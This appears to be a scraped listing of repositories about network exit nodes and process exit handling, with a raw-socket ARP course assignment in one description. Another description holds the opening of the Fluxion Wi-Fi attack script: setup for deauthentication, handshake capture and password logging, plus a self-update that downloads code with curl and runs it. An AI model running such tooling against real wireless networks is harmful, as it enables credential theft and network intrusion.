ItalyPaleAle / Tailsocks

49

Route traffic through Tailscale exit nodes using a local SOCKS5 proxy

universal

proxysocks5tailscale+1

9

Updated 1d ago

jseidl / Torblock

48

TORBlock is a BASH script to automatically download the list of TOR exit-nodes and add them to your IPTables ruleset.

universal

9

Updated 1y ago

abohmeed / Cronmanager

47

A tool for monitoring Linux cron jobs duration and exit status using Node Exporter and Prometheus. Written in Go.

universal

alertcronjobgolang+2

9

Updated 1mo ago

assafmo / IsTorExit

46

Check if an IP is a Tor exit node

universal

command-lineexit-relaynpm-package+2

9

Updated 1mo ago

cterence / Tailout

40

Spawn an exit node for your tailscale network anywhere

universal

awscligolang+3

8

Updated 1d ago

tailscale-dev / Glinet Exit Node Switch

33

A script from Mike O'Driscoll to toggle Tailscale exit nodes from a GL.iNet physical switch.

universal

6

Updated 2d ago

simonecorsi / Fine

33

🧹 Gracefully shutdown Node.js application: help you handle exit signals and cleanup

universal

eventexitfine+14

6

Updated 9h ago

RemoteToHome-io / Gl Tailscale Fix

31

Tailscale enhancements for GL.iNet routers - exit node advertisement, policy kill switch, guest network routing, GL subnet routing fix, version management

universal

6

Updated 3d ago

IntelligenceX / Ip2tor

30

IP2Tor allows to determine whether an IP address is a Tor exit node.

universal

6

Updated 8mo ago

uforia / Exitgather

30

Tool for automatic list generation of known TOR and VPN exit nodes

universal

6

Updated 20h ago

jgrahamc / Torexit

29

Small program to read lists of Tor exit nodes and draw picture showing when they join/leave list

universal

5

Updated 11mo ago

SOYJUN / Application With Raw IP Sockets

28

Overview For this assignment you will be developing an application that uses raw IP sockets to ‘walk’ around an ordered list of nodes (given as a command line argument at the ‘source’ node, which is the node at which the tour was initiated), in a manner similar to the IP SSRR (Strict Source and Record Route) option. At each node, the application pings the preceding node in the tour. However, unlike the ping code in Stevens, you will be sending the ping ICMP echo request messages through a SOCK_RAW-type PF_PACKET socket and implementing ARP functionality to find the Ethernet address of the target node. Finally, when the ‘walk’ is completed, the group of nodes visited on the tour will exchange multicast messages. Your code will consist of two process modules, a ‘Tour’ application module (which will implement all the functionality outlined above, except for ARP activity) and an ARP module. The following should prove to be useful reference material for the assignment: Sections 21.2, 21.3, 21.6 and 21.10, Chapter 21, on Multicasting. Sections 27.1 to 27.3, Chapter 27, on the IP SSRR option. Sections 28.1 to 28.5, Chapter 28, on raw sockets, the IP_HDRINCL socket option, and ping. Sections 15.5, Chapter 15, on Unix domain SOCK_STREAM sockets. Figure 29.14, p. 807, and the corresponding explanation on p. 806, on filling in an IP header when the IP_HDRINCL socket option is in effect. The Lecture Slides on ARP & RARP (especially Section 4.4, ARP Packet Format, and the Figure 4.3 it includes). The link http://www.pdbuchan.com/rawsock/rawsock.html contains useful code samples that use IP raw sockets and PF_PACKET sockets. Note, in partcular, the code “icmp4_ll.c” in Table 2 for building an echo request sent through a PF_PACKET SOCK_RAW socket. The VMware environment You will be using the same vm1 , . . . . . , vm10 nodes you used for Assignment 3. However, unlike Assignment 3, you should use only interfaces eth0 and their associated IP addresses and ignore the other Ethernet interfaces that nodes have (interfaces eth0 make vm1 , . . . . . , vm10 look as if they belong to the same Ethernet LAN segment IP network 130.245.156.0/24). Note that, apart from the primary IP addresses associated with interfaces eth0, some nodes might also have one or more alias IP addresses associated with their interface eth0. Tour application module specifications The application will create a total of four sockets: two IP raw sockets, a PF_PACKET socket and a UDP socket for multicasting. We shall call the two IP raw sockets the ‘rt ’ (‘route traversal’) and ‘pg ’ (‘ping’) sockets, respectively. The rt socket should have the IP_HDRINCL option set. You will only be receiving ICMP echo reply messages through the pg socket (and not sending echo requests), so it does not matter whether it has the IP_HDRINCL option set or not. The pg socket should have protocol value (i.e., protocol demultiplexing key in the IP header) IPPROTO_ICMP. The rt socket should have a protocol value that identifies the application - i.e., some value other than the IPPROTO_XXXX values in /usr/include/netinet/in.h. However, remember that you will all be running your code using the same root account on the vm1 , . . . . . , vm10 nodes. So if two of you happen to choose the same protocol value and happen to be running on the same vm node at the same time, your applications will receive each other’s IP packets. For that reason, try to choose a protocol value for your rt socket that is likely to be unique to yourself. The PF_PACKET socket should be of type SOCK_RAW (not SOCK_DGRAM). This socket should have a protocol value of ETH_P_IP = 0x0800 (IPv4). The UDP socket for multicasting will be discussed below. Note that, depending on how you choose to bind that socket, you might actually need to have two UDP sockets for multicast communication – see bottom of p. 576, Section 21.10. Your application will, of course, have to be running on every vm node that is included in the tour. When evoking the application on the source node, the user supplies a sequence of vm node names (not IP addresses) to be visited in order. This command line sequence starts with the next node to be visited from the source node (i.e., it does not start with the source node itself). The sequence can include any number of repeated visits to the same node. For example, suppose that the source node is vm3 and the executable is called badr_tour : [root@vm3/root]# badr_tour vm2 vm10 vm4 vm7 vm5 vm2 vm6 vm2 vm9 vm4 vm7 vm2 vm6 vm5 vm1 vm10 vm8 (but note that the tour does not necessarily have to visit every vm node; and the same node should not appear consequentively in the tour list – i.e., the next node on the tour cannot be the current node itself). The application turns the sequence into a list of IP addresses for source routing. It also adds the IP address of the source node itself to the beginning of the list. The list thus produced will be carried as the payload of an IP packet, not as a SSRR option in the packet header. It is our application which will ensure that every node in the sequence is visited in order, not the IP SSRR capability. The source node should also add to the list an IP multicast address and a port number of its choice. It should also join the multicast group at that address and port number on its UDP socket. The TTL for outgoing multicasts should be set to 1. The application then fills in the header of an IP packet, designating itself as the IP source, and the next node to be visited as the IP destination. The packet is sent out on the rt socket. Note that on Linux, all the fields of the packet header must be in network byte order (Stevens, Section 28.3, p. 737, the fourth bullet point). When filling in the packet header, you should explicitly fill in the identification field (recall that, with the IP_HDRINCL socket option, if the identification field is given value 0, then the kernel will set its value). Try to make sure that the value you choose is likely to be unique to yourself (for reasons similar to those explained with respect to the IPPROTO_XXXX in 1. above). When a node receives an IP packet on its rt socket, it should first check that the identification field carries the right value (this implies that you will hard code your choice of identification field value determined in item 2 above in your code). If the identification field value does not check out, the packet is ignored. For a valid packet : Print out a message along the lines of: <time> received source routing packet from <hostname> <time> is the current time in human-readable format (see lines 19 & 20 in Figure 1.9, p. 14, and the corresponding explanation on p. 14f.), and <hostname> is the host name corresponding to the source IP address in the header of the received packet. If this is the first time the node is visited, the application should use the multicast address and port number in the packet received to join the multicast group on its UDP socket. The TTL for outgoing multicasts should be set to 1. The application updates the list in the payload, so that the next node in the tour can easily identify what the next hop from itself will be when it receives the packet. How you do this I leave up to you. You could, for example, include as part of the payload a pointer field into the list of nodes to be visited. This pointer would then be updated to the next entry in the list as the packet progresses hop by hop (see Figure 27.1 and the associated explanation on pp. 711-712). Other solutions are, of course, possible. The application then fills in a new IP header, designating itself as the IP source, and the next node to be visited as the IP destination. The identification field should be set to the same value as in the received packet. The packet is sent out on the rt socket. The node should also initiate pinging to the preceding node in the tour (the IP address of which it should pick up from the header of the received packet). However, unlike the Stevens ping code, it will be using the SOCK_RAW-type PF_PACKET socket of item 1 above to send the ICMP echo request messages. Before it can send echo request messages, the application has to call on the ARP module you will implement to get the Ethernet address of this preceding / ‘target’ node; this call is made using the API function areq which you will also implement (see sections ARP module specifications & API specifications below). Note that ARP has to be evoked every time the application wants to send out an echo request message, and not just the first time. An echo request message has to be encapsulated in a properly-formulated IP packet, which is in turn encapsulated in a properly-formulated Ethernet frame transmitted out through the PF_PACKET socket ; otherwise, ICMP at the source node will not receive it. You will have to modify Stevens’ ping code accordingly, specifically, the send_v4 function. In particular, the Ethernet frame must have a value of ETH_P_IP = 0x0800 (IPv4 – see <linux/if_ether.h>) in the frame type / ‘length’ field ; and the encapsulated IP packet must have a value of IPPROTO_ICMP = 0x01 (ICMPv4 – see <netinet_in.h>) in its protocol field. You should also simplify the ping code in its entirety by stripping all the ‘indirection’ IPv4 / IPv6 dual-operability paraphernalia and making the code work just for IPv4. Also note that the functions host_serv and freeaddrinfo, together with the associated structure addrinfo (see Sections 11.6, 11.8 & 11.11), in Figures 27.3, 27.6 & 28.5 ( pp. 713, 716 & 744f., respectively) can be replaced by the function gethostbyname and associated structure hostent (see Section 11.3) where needed. Also, there is no ‘-v’ verbose option, so this too should be stripped from Stevens’ code. When a node is ready to start pinging, it first prints out a ‘PING’ message similar to lines 32-33 of Figure 28.5, p. 744. It then builds up ICMP echo request messages and sends them to the source node every 1 second through the PF_PACKET socket. It also reads incoming echo response messages off the pg socket, in response to which it prints out the same kind of output as the code of Figure 28.8, p. 748. If this node and its preceding node have been previously visited in that order during the tour, then pinging would have already been initiated from the one to the other in response to the first visit, and nothing further should nor need be done during second and subsequent visits. In light of the above, note that once a node initiates pinging, it needs to read from both its rt and pg sockets, necessitating the use of the select function. As will be clear from what follows below, the application will anyway be needing also to simultaneously monitor its UDP socket for incoming multicast datagrams. When the last node on the tour is reached, and if this is the first time it is visited, it joins the multicast group and starts pinging the preceding node (if it is not already doing so). After a few echo replies are received (five, say), it sends out the multicast message below on its UDP socket (i.e., the node should wait about five seconds before sending the multicast message) : <<<<< This is node vmi . Tour has ended . Group members please identify yourselves. >>>>> where vmi is the name (not IP address) of the node. The node should also print this message out on stdout preceded, on the same line, by the phrase: Node vmi . Sending: <then print out the message sent>. Each node vmj receiving this message should print out the message received preceded, on the same line, by the phrase: Node vmj . Received <then print out the message received>. Each such node in step a above should then immediately stop its pinging activity. The node should then send out the following multicast message: <<<<< Node vmj . I am a member of the group. >>>>> and print out this message preceded, on the same line, by the phrase: Node vmj . Sending: <then print out the message sent>. Each node receiving these second multicast messages (i.e., the messages that nodes – including itself – sent out in step c above) should print each such message out preceded, on the same line, by the phrase: Node vmk . Received: <then print out the message received>. Reading from the socket in step d above should be implemented with a 5-second timeout. When the timeout expires, the node should print out another message to the effect that it is terminating the Tour application, and gracefully exit its Tour process. Note that under Multicast specifications, the last node in the tour, which sends out the End of Tour message, should itself receive a copy of that message and, when it does, it should behave exactly as do the other nodes in steps a. – e. above. ARP module specifications Your executable is evoked with no command line arguments. Like the Tour module, it will be running on every vm node. It uses the get_hw_addrs function of Assignment 3 to explore its node’s interfaces and build a set of <IP address , HW address> matching pairs for all eth0 interface IP addresses (including alias IP addresses, if any). Write out to stdout in some appropriately clear format the address pairs found. The module creates two sockets: a PF_PACKET socket and a Unix domain socket. The PF_PACKET should be of type SOCK_RAW (not type SOCK_DGRAM) with a protocol value of your choice (but not one of the standard values defined in <linux/if_ether.h>) which is, hopefully, unique to yourself. This value effectively becomes the protocol value for your implementation of ARP. Because this protocol value will be carried in the frame type / ‘length’ field of the Ethernet frame header (see Figure 4.3 of the ARP & RARP handout), the value chosen should be not less than 1536 (0x600) so that it is not misinterpreted as the length of an Ethernet 802.3 frame. The Unix domain socket should be of type SOCK_STREAM (not SOCK_DGRAM). It is a listening socket bound to a ‘well-known’ sun_path file. This socket will be used to communicate with the function areq that is implemented in the Tour module (see the section API specifications below). In this context, areq will act as the client and the ARP module as the server. The ARP module then sits in an infinite loop, monitoring these two sockets. As ARP request messages arrive on the PF_PACKET socket, the module processes them, and responds with ARP reply messages as appropriate. The protocol builds a ‘cache’ of matching <IP address , HW address> pairs from the replies (and requests – see below) it receives. For simplicity, and unlike the real ARP, we shall not implement timing out mechanisms for these cache entries. A cache entry has five parts: (i) IP address ; (ii) HW address ; (iii) sll_ifindex (the interface to be used for reaching the matching pair <(i) , (ii)>) ; (iv) sll_hatype ; and (v) a Unix-domain connection-socket descriptor for a connected client (see the section API specifications below for the latter three). When an ARP reply is being entered in the cache, the ARP module uses the socket descriptor in (v) to send a reply to the client, closes the connection socket, and deletes the socket descriptor from the cache entry. Note that, like the real ARP, when an ARP request is received by a node, and if the request pertains to that receiving node, the sender’s (see Figure 4.3 of the ARP & RARP handout) <IP address, HW address> matching pair should be entered into the cache if it is not already there (together, of course, with (iii) sll_ifindex & (iv) sll_hatype), or updated if need be if such an entry already exists in the cache. If the ARP request received does not pertain to the node receiving it, but there is already an entry in that receiving node's cache for the sender’s <IP address, HW address> matching pair, that entry should be checked and updated if need be. If there is no such entry, no action is taken (in particular, and unlike the case above, no new entry should be made in the receiving node's cache of the sender’s <IP address, HW address> matching pair if such an entry does not already exist). ARP request and reply messages have the same format as Figure 4.3 of the ARP & RARP handout, but with an extra 2-byte identification field added at the beginning which you fill with a value chosen so that it has a high probability of being unique to yourself. This value is to be echoed in the reply message, and helps to act as a further filter in case some other student happens to have fortuitously chosen the same value as yourself for the protocol parameter of the ARP PF_PACKET. Values in the fields of our ARP messages must be in network byte order. You might find the system header file <linux/if_arp.h> useful for manipulating ARP request and reply messages, but remember that our version of these messages have an extra two-byte field as mentioned above. Your code should print out on stdout, in some appropriately clear format, the contents of the Ethernet frame header and ARP request message you send. As described in Section 4.4 of the ARP & RARP handout, the node that responds to the request should, in its reply message, swap the two sender addresses with the two target addresses, as well as, of course, echo back the extra identification field sent with the request. The protocol at this responding node should print out, in an appropriately clear format, both the request frame (header and ARP message) it receives and the reply frame it sends. Similarly, the node that sent the request should print out the reply frame it receives. Finally, recall that the node issuing the request sends out a broadcast Ethernet frame, but the responding node replies with a unicast frame. API specifications The API is for communication between the Tour process and the ARP process. It consists of a single function, areq, implemented in the Tour module. areq is called by send_v4 function of the application every time the latter want to send out an ICMP echo request message: int areq (struct sockaddr *IPaddr, socklen_t sockaddrlen, struct hwaddr *HWaddr); IPaddr contains the primary or alias IPaddress of a ‘target’ node on the LAN for which the corresponding hardware address is being requested. hwaddr is a new structure (and not a pre-existing type) modeled on the sockaddr_ll of PF_PACKET; you will have to declare it in your code. It is used to return the requested hardware address to the caller of areq : structure hwaddr { int sll_ifindex; /* Interface number */ unsigned short sll_hatype; /* Hardware type */ unsigned char sll_halen; /* Length of address */ unsigned char sll_addr[8]; /* Physical layer address */ }; areq creates a Unix domain socket of type SOCK_STREAM and connects to the ‘well-known’ sun_path file of the ARP listening socket. It sends the IP address from parameter IPaddr and the information in the three fields of parameter HWaddr to ARP. It then blocks on a read awaiting a reply from ARP. This read should be backed up by a timeout since it is possible that no reply is received for the request. If a timeout occurs, areq should close the socket and return to its caller indicating failure (through its int return value). Your application code should print out on stdout, in some appropriately clear format, a notification every time areq is called, giving the IP address for which a HW address is being sought. It should similarly print out the result when the call to areq returns (HW address returned, or failure). When the ARP module receives a request for a HW address from areq through its Unix domain listening socket, it first checks if the required HW address is already in the cache. If so, it can respond immediately to the areq and close the Unix domain connection socket. Else : it makes an ‘incomplete’ entry in the cache, consisting of parts (i), (iii), (iv) and (v) ; puts out an ARP request message on the network on its PF_PACKET socket; and starts monitoring the areq connection socket for readability – if the areq client closes the connection socket (this would occur in response to a timeout in areq), ARP deletes the corresponding incomplete entry from the cache (and ignores any subsequent ARP reply from the network if such is received). On the other hand, if ARP receives a reply from the network, it updates the incomplete cache entry, responds to areq, and closes the connection socket.

tailscale-support / Mullvad Script

26

sh script to help automate signing of Mullvad exit nodes with Tailnet Lock

universal

5

Updated 4d ago

shahradelahi / Node Exit Signal

23

🛑 Gracefully handle process termination in Node.js with custom exit hooks.

universal

exitgracefulnodejs+2

4

Updated 5mo ago

eon01 / NodeSS

23

NodeSS: Node.js Security Scanner : This container will scan your Nodejs code for dependency vulnerabilities, print the result and exits

universal

4

Updated 2y ago

k4m4 / Tor Detect

22

Detect whether an IP address belongs to a Tor exit node.

universal

detectionnodejstor

4

Updated 1d ago

nokonoko / Fuck AWS Tor

20

Script to download all AWS IPv4 ranges & Tor exit node IPv4 list with the option to format it as a Nginx deny list or just plain text.

universal

awsblacklistblacklist-ips+7

4

Updated 5mo ago

Emersonmafra / F

19

#!/bin/bash ########## DEBUG Mode ########## if [ -z ${FLUX_DEBUG+x} ]; then FLUX_DEBUG=0 else FLUX_DEBUG=1 fi ################################ ####### preserve network ####### if [ -z ${KEEP_NETWORK+x} ]; then KEEP_NETWORK=0 else KEEP_NETWORK=1 fi ################################ ###### AUTO CONFIG SETUP ####### if [ -z ${FLUX_AUTO+x} ]; then FLUX_AUTO=0 else FLUX_AUTO=1 fi ################################ if [[ $EUID -ne 0 ]]; then echo -e "\e[1;31mYou don't have admin privilegies, execute the script as root.""\e[0m""" exit 1 fi if [ -z "${DISPLAY:-}" ]; then echo -e "\e[1;31mThe script should be exected inside a X (graphical) session.""\e[0m""" exit 1 fi clear ##################################### < CONFIGURATION > ##################################### DUMP_PATH="/tmp/TMPflux" HANDSHAKE_PATH="/root/handshakes" PASSLOG_PATH="/root/pwlog" WORK_DIR=`pwd` DEAUTHTIME="9999999999999" revision=9 version=2 IP=192.168.1.1 RANG_IP=$(echo $IP | cut -d "." -f 1,2,3) #Colors white="\033[1;37m" grey="\033[0;37m" purple="\033[0;35m" red="\033[1;31m" green="\033[1;32m" yellow="\033[1;33m" Purple="\033[0;35m" Cyan="\033[0;36m" Cafe="\033[0;33m" Fiuscha="\033[0;35m" blue="\033[1;34m" transparent="\e[0m" general_back="Back" general_error_1="Not_Found" general_case_error="Unknown option. Choose again" general_exitmode="Cleaning and closing" general_exitmode_1="Disabling monitoring interface" general_exitmode_2="Disabling interface" general_exitmode_3="Disabling "$grey"forwarding of packets" general_exitmode_4="Cleaning "$grey"iptables" general_exitmode_5="Restoring "$grey"tput" general_exitmode_6="Restarting "$grey"Network-Manager" general_exitmode_7="Cleanup performed successfully!" general_exitmode_8="Thanks for using fluxion" ############################################################################################# # DEBUG MODE = 0 ; DEBUG MODE = 1 [Normal Mode / Developer Mode] if [ $FLUX_DEBUG = 1 ]; then ## Developer Mode export flux_output_device=/dev/stdout HOLD="-hold" else ## Normal Mode export flux_output_device=/dev/null HOLD="" fi # Delete Log only in Normal Mode ! function conditional_clear() { if [[ "$flux_output_device" != "/dev/stdout" ]]; then clear; fi } function airmon { chmod +x lib/airmon/airmon.sh } airmon # Check Updates function checkupdatess { revision_online="$(timeout -s SIGTERM 20 curl "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion" 2>/dev/null| grep "^revision" | cut -d "=" -f2)" if [ -z "$revision_online" ]; then echo "?">$DUMP_PATH/Irev else echo "$revision_online">$DUMP_PATH/Irev fi } # Animation function spinner { local pid=$1 local delay=0.15 local spinstr='|/-\' while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do local temp=${spinstr#?} printf " [%c] " "$spinstr" local spinstr=$temp${spinstr%"$temp"} sleep $delay printf "\b\b\b\b\b\b" done printf " \b\b\b\b" } # ERROR Report only in Developer Mode function err_report { echo "Error on line $1" } if [ $FLUX_DEBUG = 1 ]; then trap 'err_report $LINENUM' ERR fi #Function to executed in case of unexpected termination trap exitmode SIGINT SIGHUP source lib/exitmode.sh #Languages for the web interface source language/source # Design function top(){ conditional_clear echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" echo -e "$red[ ]" echo -e "$red[ $red FLUXION $version" "${yellow} ${red} < F""${yellow}luxion" "${red}I""${yellow}s" "${red}T""${yellow}he ""${red}F""${yellow}uture > " ${blue}" ]" echo -e "$blue[ ]" echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" echo echo } ############################################## < START > ############################################## # Check requirements function checkdependences { echo -ne "aircrack-ng....." if ! hash aircrack-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "aireplay-ng....." if ! hash aireplay-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "airmon-ng......." if ! hash airmon-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "airodump-ng....." if ! hash airodump-ng 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "awk............." if ! hash awk 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "curl............" if ! hash curl 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "dhcpd..........." if ! hash dhcpd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (isc-dhcp-server)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "hostapd........." if ! hash hostapd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "iwconfig........" if ! hash iwconfig 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "lighttpd........" if ! hash lighttpd 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "macchanger......" if ! hash macchanger 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "mdk3............" if ! hash mdk3 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "nmap............" if ! [ -f /usr/bin/nmap ]; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "php-cgi........." if ! [ -f /usr/bin/php-cgi ]; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "pyrit..........." if ! hash pyrit 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "python.........." if ! hash python 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "unzip..........." if ! hash unzip 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "xterm..........." if ! hash xterm 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "openssl........." if ! hash openssl 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "rfkill.........." if ! hash rfkill 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent"" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "strings........." if ! hash strings 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (binutils)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 echo -ne "fuser..........." if ! hash fuser 2>/dev/null; then echo -e "\e[1;31mNot installed"$transparent" (psmisc)" exit=1 else echo -e "\e[1;32mOK!"$transparent"" fi sleep 0.025 if [ "$exit" = "1" ]; then exit 1 fi sleep 1 clear } top checkdependences # Create working directory if [ ! -d $DUMP_PATH ]; then mkdir -p $DUMP_PATH &>$flux_output_device fi # Create handshake directory if [ ! -d $HANDSHAKE_PATH ]; then mkdir -p $HANDSHAKE_PATH &>$flux_output_device fi #create password log directory if [ ! -d $PASSLOG_PATH ]; then mkdir -p $PASSLOG_PATH &>$flux_output_device fi if [ $FLUX_DEBUG != 1 ]; then clear; echo "" sleep 0.01 && echo -e "$red " sleep 0.01 && echo -e " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐ " sleep 0.01 && echo -e " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║ " sleep 0.01 && echo -e " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜ " sleep 0.01 && echo -e " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║ " sleep 0.01 && echo -e " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘ " sleep 0.01 && echo -e " ¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ " echo"" sleep 0.1 echo -e $red" FLUXION "$white""$version" (rev. "$green "$revision"$white") "$yellow"by "$white" ghost" sleep 0.1 echo -e $green " Page:"$red"https://github.com/FluxionNetwork/fluxion "$transparent sleep 0.1 echo -n " Latest rev." tput civis checkupdatess & spinner "$!" revision_online=$(cat $DUMP_PATH/Irev) echo -e ""$white" [${purple}${revision_online}$white"$transparent"]" if [ "$revision_online" != "?" ]; then if [ "$revision" -lt "$revision_online" ]; then echo echo echo -ne $red" New revision found! "$yellow echo -ne "Update? [Y/n]: "$transparent read -N1 doupdate echo -ne "$transparent" doupdate=${doupdate:-"Y"} if [ "$doupdate" = "Y" ]; then cp $0 $HOME/flux_rev-$revision.backup curl "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion" -s -o $0 echo echo echo -e ""$red"Updated successfully! Restarting the script to apply the changes ..."$transparent"" sleep 3 chmod +x $0 exec $0 exit fi fi fi echo "" tput cnorm sleep 1 fi # Show info for the selected AP function infoap { Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}' | tr [:upper:] [:lower:]` Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | cut -d " " -f 5-` echo "INFO WIFI" echo echo -e " "$blue"SSID"$transparent" = $Host_SSID / $Host_ENC" echo -e " "$blue"Channel"$transparent" = $channel" echo -e " "$blue"Speed"$transparent" = ${speed:2} Mbps" echo -e " "$blue"BSSID"$transparent" = $mac (\e[1;33m$Host_MAC_MODEL $transparent)" echo } ############################################### < MENU > ############################################### # Windows + Resolution function setresolution { function resA { TOPLEFT="-geometry 90x13+0+0" TOPRIGHT="-geometry 83x26-0+0" BOTTOMLEFT="-geometry 90x24+0-0" BOTTOMRIGHT="-geometry 75x12-0-0" TOPLEFTBIG="-geometry 91x42+0+0" TOPRIGHTBIG="-geometry 83x26-0+0" } function resB { TOPLEFT="-geometry 92x14+0+0" TOPRIGHT="-geometry 68x25-0+0" BOTTOMLEFT="-geometry 92x36+0-0" BOTTOMRIGHT="-geometry 74x20-0-0" TOPLEFTBIG="-geometry 100x52+0+0" TOPRIGHTBIG="-geometry 74x30-0+0" } function resC { TOPLEFT="-geometry 100x20+0+0" TOPRIGHT="-geometry 109x20-0+0" BOTTOMLEFT="-geometry 100x30+0-0" BOTTOMRIGHT="-geometry 109x20-0-0" TOPLEFTBIG="-geometry 100x52+0+0" TOPRIGHTBIG="-geometry 109x30-0+0" } function resD { TOPLEFT="-geometry 110x35+0+0" TOPRIGHT="-geometry 99x40-0+0" BOTTOMLEFT="-geometry 110x35+0-0" BOTTOMRIGHT="-geometry 99x30-0-0" TOPLEFTBIG="-geometry 110x72+0+0" TOPRIGHTBIG="-geometry 99x40-0+0" } function resE { TOPLEFT="-geometry 130x43+0+0" TOPRIGHT="-geometry 68x25-0+0" BOTTOMLEFT="-geometry 130x40+0-0" BOTTOMRIGHT="-geometry 132x35-0-0" TOPLEFTBIG="-geometry 130x85+0+0" TOPRIGHTBIG="-geometry 132x48-0+0" } function resF { TOPLEFT="-geometry 100x17+0+0" TOPRIGHT="-geometry 90x27-0+0" BOTTOMLEFT="-geometry 100x30+0-0" BOTTOMRIGHT="-geometry 90x20-0-0" TOPLEFTBIG="-geometry 100x70+0+0" TOPRIGHTBIG="-geometry 90x27-0+0" } detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3) ## A) 1024x600 ## B) 1024x768 ## C) 1280x768 ## D) 1280x1024 ## E) 1600x1200 case $detectedresolution in "1024x600" ) resA ;; "1024x768" ) resB ;; "1280x768" ) resC ;; "1366x768" ) resC ;; "1280x1024" ) resD ;; "1600x1200" ) resE ;; "1366x768" ) resF ;; * ) resA ;; esac language; setinterface } function language { iptables-save > $DUMP_PATH/iptables-rules conditional_clear if [ "$FLUX_AUTO" = "1" ];then source $WORK_DIR/language/en; setinterface else while true; do conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" Select your language" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" English " echo -e " "$red"["$yellow"2"$red"]"$transparent" German " echo -e " "$red"["$yellow"3"$red"]"$transparent" Romanian " echo -e " "$red"["$yellow"4"$red"]"$transparent" Turkish " echo -e " "$red"["$yellow"5"$red"]"$transparent" Spanish " echo -e " "$red"["$yellow"6"$red"]"$transparent" Chinese " echo -e " "$red"["$yellow"7"$red"]"$transparent" Italian " echo -e " "$red"["$yellow"8"$red"]"$transparent" Czech " echo -e " "$red"["$yellow"9"$red"]"$transparent" Greek " echo -e " "$red"["$yellow"10"$red"]"$transparent" French " echo -e " "$red"["$yellow"11"$red"]"$transparent" Slovenian " echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) source $WORK_DIR/language/en; break;; 2 ) source $WORK_DIR/language/ger; break;; 3 ) source $WORK_DIR/language/ro; break;; 4 ) source $WORK_DIR/language/tu; break;; 5 